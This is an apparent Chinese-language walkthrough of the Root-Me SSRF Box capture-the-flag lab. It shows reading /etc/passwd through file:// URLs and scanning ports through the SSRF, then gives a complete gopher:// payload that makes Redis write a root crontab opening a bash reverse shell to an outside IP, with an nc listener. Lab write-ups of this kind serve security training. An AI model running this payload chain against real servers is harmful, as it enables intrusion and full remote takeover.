Rootme CTF all the day靶场ssrf漏洞

Rootme CTF all the day靶场ssrf漏洞

文章目录

  • Rootme CTF all the day靶场ssrf漏洞
    • 一、漏洞环境
    • 二、测试过程
        • 读系统文件
        • 探测开放的服务器端口
        • 利用redis写定时任务来反弹shell

一、漏洞环境

Rootme CTF all the day

漏洞地址:https://www.root-me.org/en/Capture-The-Flag/CTF-all-the-day/

二、测试过程

1、访问漏洞地址,没有账号的话,注册账号,然后进去找到一个处于none的虚拟机,点击房间号进入(如果进去没有看见房间号,在页面最下面找到如下界面,点击就可以进入了)

Rootme CTF all the day靶场ssrf漏洞_第1张图片
2、然后进入房间后,选择需要创建的虚拟机,选择SSRF Box,点击保存,选择start the game。然后访问 ctf04.root-me.org 就可以看到启动的虚拟环境了。
Rootme CTF all the day靶场ssrf漏洞_第2张图片

3、在页面的输入框中输入百度地址后,会把百度首页加载进来。
Rootme CTF all the day靶场ssrf漏洞_第3张图片

读系统文件

1、可以在输入框中随便输一个url,抓包,然后把包发送到Repeater模块,把url后面的内容修改为 file:///etc/passwd,来读取该文件
Rootme CTF all the day靶场ssrf漏洞_第4张图片

探测开放的服务器端口

1、将包发送到Intruder模块,端口开放显示为OK,没有开放显示为Connection refused。
Rootme CTF all the day靶场ssrf漏洞_第5张图片

2、这里我们已经知道是6379端口了,所以区间就设置的很小(6300-6400)
Rootme CTF all the day靶场ssrf漏洞_第6张图片
Rootme CTF all the day靶场ssrf漏洞_第7张图片
3、对比6319端口的包和其他的端口的包的区别,6379端口开放,所以显示为OK,其他端口没有开放显示为Connection refused
Rootme CTF all the day靶场ssrf漏洞_第8张图片

利用redis写定时任务来反弹shell

要用到一台外网主机,然后使用nc做端口监听。

1、payload:

gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$61%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/外网IP/2233 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a

解码后的内容:

gopher://127.0.0.1:6379/_*3
$3
set
$1
1
$61



*/1 * * * * bash -i >& /dev/tcp/外网IP/2233 0>&1




*4
$6
config
$3
set
$3
dir
$16
/var/spool/cron/
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
save
*1
$4
quit

2、然后将payload放到页面的输入框中
Rootme CTF all the day靶场ssrf漏洞_第9张图片
3、在外网机器上开启监听,命令:nc -l 2233,就可以getshell了。
Rootme CTF all the day靶场ssrf漏洞_第10张图片
4、然后再到网站目录输入我们找到的falg,就结束了。
Rootme CTF all the day靶场ssrf漏洞_第11张图片
参考文章:https://www.freebuf.com/column/227309.html

你可能感兴趣的:(漏洞复现)